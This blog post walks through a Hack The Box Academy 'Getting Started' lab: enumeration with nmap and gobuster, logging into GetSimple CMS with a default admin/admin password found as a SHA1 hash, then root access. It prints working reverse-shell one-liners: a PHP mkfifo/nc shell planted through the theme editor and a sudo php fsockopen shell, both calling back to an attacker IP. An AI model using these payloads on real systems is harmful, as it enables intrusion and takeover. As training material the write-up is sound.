In this post, I will walk through the knowledge check from the Getting Started module (Nibbles).
The steps are very similar to the Nibbles problem, but there are some variations.
I will share how to solve the problem.
Enumeration
First of all, we need to scan a target IP to collect information.
Let’s start with nmap.
nmap -sC -sV 10.129.244.24
The output looks like this:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c73a025f5fe817b822b3649a54dc85e (RSA)
| 256 e1c056d052042f3cac9ae7b1792bbb13 (ECDSA)
|_ 256 523147140dc38e1573e3c424a23a1277 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/admin/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It has a web server, so let’s check the web page.
It looks like there is not much information in it.
I checked the page source, but there wasn’t any useful information there either.
Next, we can try to enumerate the sub-directories of the website.
gobuster dir -u http://10.129.244.24 -w /usr/share/wordlists/dirb/common.txt
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 314] [--> http://10.129.244.24/admin/]
/backups (Status: 301) [Size: 316] [--> http://10.129.244.24/backups/]
/data (Status: 301) [Size: 313] [--> http://10.129.244.24/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 316] [--> http://10.129.244.24/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 278]
/sitemap.xml (Status: 200) [Size: 431]
Running the gobuster command reveals some interesting directories.
Let’s take a look.
There is a login page at /login.
I also found another useful directory, /data.
There is a username!
I think it is the default username: admin.
Another point of interest is the <PWD> tag, which holds the hashed password!
We can check the hash type using hash-identifier.
hash-identifier d033e22ae348aeb5660fc2140aec35850c4da997
It tells us that the hash is highly likely to be SHA1.
A hash cannot be decrypted, but if we crack it (with hashcat, or simply an online lookup table), the value is admin.
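To make the "cracking" step concrete from the defender's side, here is an added audit script (not part of the original post) that parses a user file like the one found under /data/, infers the hash type from the digest length the way hash-identifier does, and reports whether the stored digest is the unsalted hash of a default password. The <PWD> tag comes from the post; the <USR> tag name, the sample file and the password list are constructed assumptions.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed sample modelled on the user file exposed under /data/ in the post.
# <PWD> is the tag the post shows; <USR> as the username tag is an assumption.
SAMPLE_USER_XML = """<item>
  <USR>admin</USR>
  <PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
</item>"""

# Small constructed list of default/weak passwords an audit should reject.
DEFAULT_PASSWORDS = ["admin", "password", "123456", "changeme", "getsimple"]

HEX_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}  # unsalted hex digests


def guess_hash_algorithm(digest):
    """Infer the unsalted algorithm from digest length, as hash-identifier does."""
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return None
    return HEX_LENGTHS.get(len(digest))


def make_user_xml(user, password, algo="sha1"):
    """Build a user file the way an unsalted CMS would store it (for testing)."""
    digest = hashlib.new(algo, password.encode()).hexdigest()
    return "<item><USR>%s</USR><PWD>%s</PWD></item>" % (user, digest)


def audit_user_file(xml_text, candidates=DEFAULT_PASSWORDS):
    """Return (user, algorithm, matched_default) for one user file.

    Nothing is decrypted: the hash is recomputed for each candidate and compared,
    which is why an unsalted SHA-1 of 'admin' protects no better than clear text.
    """
    root = ET.fromstring(xml_text)
    user = root.findtext("USR")
    digest = (root.findtext("PWD") or "").strip().lower()
    algo = guess_hash_algorithm(digest)
    if algo is None:
        return user, None, None
    for candidate in candidates:
        if hashlib.new(algo, candidate.encode()).hexdigest() == digest:
            return user, algo, candidate
    return user, algo, None


if __name__ == "__main__":
    print(audit_user_file(SAMPLE_USER_XML))  # ('admin', 'sha1', 'admin')
```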
Let’s go back to the login page and input admin, admin into username and password.
Okay! We are in now.
Let’s move on to the next step.
Reverse shell
In order to find the flags, I need a connection to the target system.
Since the website seems to let us write files, it is worth going for a reverse shell.
Looking around the admin panel, we can see that the theme editor exposes the template.php file.
Let’s delete the original code and write a script for a reverse shell.
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.175 9443 >/tmp/f"); ?>
Requesting the URL of the edited file (shown in the image above) triggers the shell script.
Start a listener on port 9443 before requesting the file.
nc -lvnp 9443
By the way, if we want to use exactly the same URL with the hostname, we need to map the domain to the target IP in the /etc/hosts file.
sudo vim /etc/hosts
...
10.10.14.254 gettingstarted.htb
OK, we are ready to go.
Let’s run it.
Boom! We are in the target system now.
It’s easy to get the user flag now.
Head to the home directory and grab it.
Ok, the next target is the root flag.
Privilege escalation
Since the user doesn’t have permission to access the root directory, we need to escalate privileges.
I checked whether the user can run anything with sudo.
sudo -l
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
And there is an interesting result!
We can run /usr/bin/php with sudo, and it doesn’t ask us for a password. So let’s use this misconfiguration.
Again, I will get a connection using a reverse shell script.
sudo /usr/bin/php -r '$sock=fsockopen("10.10.14.175",8443);exec("sh <&3 >&3 2>&3");'
Don’t forget to pick a port that is not already in use.
Listen on port 8443 and execute the command.
Now we are connected as root!
Got the root flag!